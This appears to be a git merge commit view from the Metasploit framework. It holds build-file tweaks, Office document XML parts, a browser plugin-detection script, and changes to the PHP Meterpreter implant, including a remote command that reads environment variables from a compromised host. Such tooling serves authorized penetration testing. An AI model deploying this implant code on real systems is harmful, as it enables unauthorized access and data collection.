Merge branch 'upstream/master' into basic_adsi_support

bug/bundler_fix
OJ 2013-12-10 20:58:38 +10:00
commit 2237419134
No known key found for this signature in database
GPG Key ID: 49EEE7511FAA5749
215 changed files with 9147 additions and 4280 deletions

3
.gitmodules vendored Normal file
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@ -0,0 +1,3 @@
[submodule "external/source/ReflectiveDLLInjection"]
path = external/source/ReflectiveDLLInjection
url = https://github.com/rapid7/ReflectiveDLLInjection.git

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@ -20,7 +20,7 @@ wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -40,8 +40,8 @@ Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <>

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@ -1 +1 @@
1.9.3-p448
1.9.3-p484

66
Gemfile
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@ -14,50 +14,50 @@ gem 'robots'
gem 'packetfu', '1.1.9'
group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end
group :pcap do
gem 'network_interface', '~> 0.0.1'
# For sniffer and raw socket modules
gem 'pcaprub'
# For sniffer and raw socket modules
gem 'pcaprub'
end
group :development do
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
end
group :development, :test do
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
end
group :test do
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
end

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@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>

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@ -0,0 +1,19 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
<Template>Normal.dotm</Template>
<TotalTime>4</TotalTime>
<Pages>1</Pages>
<Words>217</Words>
<Characters>1238</Characters>
<Application>Microsoft Office Word</Application>
<DocSecurity>0</DocSecurity>
<Lines>10</Lines>
<Paragraphs>2</Paragraphs>
<ScaleCrop>false</ScaleCrop>
<Company>home</Company>
<LinksUpToDate>false</LinksUpToDate>
<CharactersWithSpaces>1453</CharactersWithSpaces>
<SharedDoc>false</SharedDoc>
<HyperlinksChanged>false</HyperlinksChanged>
<AppVersion>12.0000</AppVersion>
</Properties>

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@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:creator>Win7</dc:creator>
<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
</cp:coreProperties>

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@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
</Relationships>

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@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
</Relationships>

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@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
</Relationships>

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@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
</Relationships>

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@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
</Relationships>

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@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
</Relationships>

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@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
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<c:lang val="en-US"/>
<c:chart>
<c:view3D>
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<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
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</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
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<c:pt idx="3">
<c:v>Category 4</c:v>
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<c:val>
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<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
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<c:v>2.5</c:v>
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<c:pt idx="2">
<c:v>3.5</c:v>
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<c:idx val="1"/>
<c:order val="1"/>
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<c:orientation val="minMax"/>
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<c:legend>
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<c:externalData r:id="rId1"/>
</c:chartSpace>

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@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
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<c:v>Series 1</c:v>
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<c:v>Category 1</c:v>
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<c:pt idx="1">
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<c:v>3.5</c:v>
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<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
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<c:v>Category 3</c:v>
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<c:val>
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<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
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</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="71774208"/>
<c:axId val="71776128"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="71774208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71776128"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="71776128"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71774208"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

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@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
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</w:style>
<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
<w:name w:val="Balloon Text Char"/>
<w:basedOn w:val="DefaultParagraphFont"/>
<w:link w:val="BalloonText"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:rsid w:val="00CD271A"/>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
</w:styles>

View File

@ -0,0 +1,283 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
<a:themeElements>
<a:clrScheme name="Office">
<a:dk1>
<a:sysClr val="windowText" lastClr="000000"/>
</a:dk1>
<a:lt1>
<a:sysClr val="window" lastClr="FFFFFF"/>
</a:lt1>
<a:dk2>
<a:srgbClr val="1F497D"/>
</a:dk2>
<a:lt2>
<a:srgbClr val="EEECE1"/>
</a:lt2>
<a:accent1>
<a:srgbClr val="4F81BD"/>
</a:accent1>
<a:accent2>
<a:srgbClr val="C0504D"/>
</a:accent2>
<a:accent3>
<a:srgbClr val="9BBB59"/>
</a:accent3>
<a:accent4>
<a:srgbClr val="8064A2"/>
</a:accent4>
<a:accent5>
<a:srgbClr val="4BACC6"/>
</a:accent5>
<a:accent6>
<a:srgbClr val="F79646"/>
</a:accent6>
<a:hlink>
<a:srgbClr val="0000FF"/>
</a:hlink>
<a:folHlink>
<a:srgbClr val="800080"/>
</a:folHlink>
</a:clrScheme>
<a:fontScheme name="Office">
<a:majorFont>
<a:latin typeface="Cambria"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" ゴシック"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Times New Roman"/>
<a:font script="Hebr" typeface="Times New Roman"/>
<a:font script="Thai" typeface="Angsana New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="MoolBoran"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Times New Roman"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:majorFont>
<a:minorFont>
<a:latin typeface="Calibri"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" 明朝"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Arial"/>
<a:font script="Hebr" typeface="Arial"/>
<a:font script="Thai" typeface="Cordia New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="DaunPenh"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Arial"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:minorFont>
</a:fontScheme>
<a:fmtScheme name="Office">
<a:fillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="50000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="35000">
<a:schemeClr val="phClr">
<a:tint val="37000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:tint val="15000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="1"/>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:shade val="51000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="80000">
<a:schemeClr val="phClr">
<a:shade val="93000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="94000"/>
<a:satMod val="135000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="0"/>
</a:gradFill>
</a:fillStyleLst>
<a:lnStyleLst>
<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr">
<a:shade val="95000"/>
<a:satMod val="105000"/>
</a:schemeClr>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
</a:lnStyleLst>
<a:effectStyleLst>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="38000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
<a:scene3d>
<a:camera prst="orthographicFront">
<a:rot lat="0" lon="0" rev="0"/>
</a:camera>
<a:lightRig rig="threePt" dir="t">
<a:rot lat="0" lon="0" rev="1200000"/>
</a:lightRig>
</a:scene3d>
<a:sp3d>
<a:bevelT w="63500" h="25400"/>
</a:sp3d>
</a:effectStyle>
</a:effectStyleLst>
<a:bgFillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="40000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="40000">
<a:schemeClr val="phClr">
<a:tint val="45000"/>
<a:shade val="99000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="20000"/>
<a:satMod val="255000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
</a:path>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="80000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="30000"/>
<a:satMod val="200000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
</a:path>
</a:gradFill>
</a:bgFillStyleLst>
</a:fmtScheme>
</a:themeElements>
<a:objectDefaults/>
<a:extraClrSchemeLst/>
</a:theme>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:optimizeForBrowser/>
</w:webSettings>

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@ -1,5 +1,51 @@
window.misc_addons_detect = { };
/**
* Detects whether the browser supports Silverlight or not
**/
window.misc_addons_detect.hasSilverlight = function () {
var found = false;
//
// When on IE, we can use AgControl.AgControl to actually detect the version too.
// But this ability is specific to IE, so we fall back to just true/false response
//
try {
var ax = new ActiveXObject('AgControl.AgControl');
found = true;
} catch(e) {}
//
// ActiveX didn't get anything, try looking in MIMEs
//
if (!found) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i < mimes.length; i++) {
if (/x\-silverlight/.test(mimes[i].type)) {
found = true;
break;
}
}
}
//
// MIMEs didn't work either. Try navigator.
//
if (!found) {
var count = navigator.plugins.length;
for (var i=0; i < count; i++) {
var pluginName = navigator.plugins[i].name;
if (/Silverlight Plug\-In/.test(pluginName)) {
found = true;
break;
}
}
}
return found;
}
/**
* Returns the Java version
**/

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@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
define("TLV_TYPE_ARCHITECTURE", TLV_META_TYPE_STRING | 1043);
define("TLV_TYPE_LANG_SYSTEM", TLV_META_TYPE_STRING | 1044);
# Environment
define("TLV_TYPE_ENV_VARIABLE", TLV_META_TYPE_STRING | 1100);
define("TLV_TYPE_ENV_VALUE", TLV_META_TYPE_STRING | 1101);
define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000);
# eval'd twice
my_print("Evaling stdapi");
##
##
# Search Helpers
##
@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048);
*/
if (!function_exists('safe_glob')) {
function safe_glob($pattern, $flags=0) {
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
}
}
/**
@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) {
*/
if (!function_exists('fnmatch')) {
function fnmatch($pattern, $string) {
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
}
}
@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) {
else
$array[$key] = $string.$element;
return $array;
}
}
@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
return ERROR_SUCCESS;
}
@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
return ERROR_SUCCESS;
}
@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
}
}
if (!function_exists('stdapi_sys_config_getenv')) {
register_command('stdapi_sys_config_getenv');
function stdapi_sys_config_getenv($req, &$pkt) {
my_print("doing getenv");
$variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
# If we decide some day to have sys.config.getenv return all env
# vars when given an empty search list, this is one way to do it.
#if (empty($variable_tlvs)) {
# # We don't have a var to look up, return all of 'em
# $variables = array_keys($_SERVER);
#} else {
# $variables = array();
# foreach ($variable_tlvs as $tlv) {
# array_push($variables, $tlv['value']);
# }
#}
foreach ($variable_tlvs as $name) {
$canonical_name = str_replace(array("$","%"), "", $name['value']);
$env = getenv($canonical_name);
if ($env !== FALSE) {
$grp = "";
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
}
}
return ERROR_SUCCESS;
}
}
# Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
@ -696,24 +739,24 @@ function close_process($proc) {
foreach ($proc['pipes'] as $f) {
@fclose($f);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
unset($channel_process_map[$proc['cid']]);
}

View File

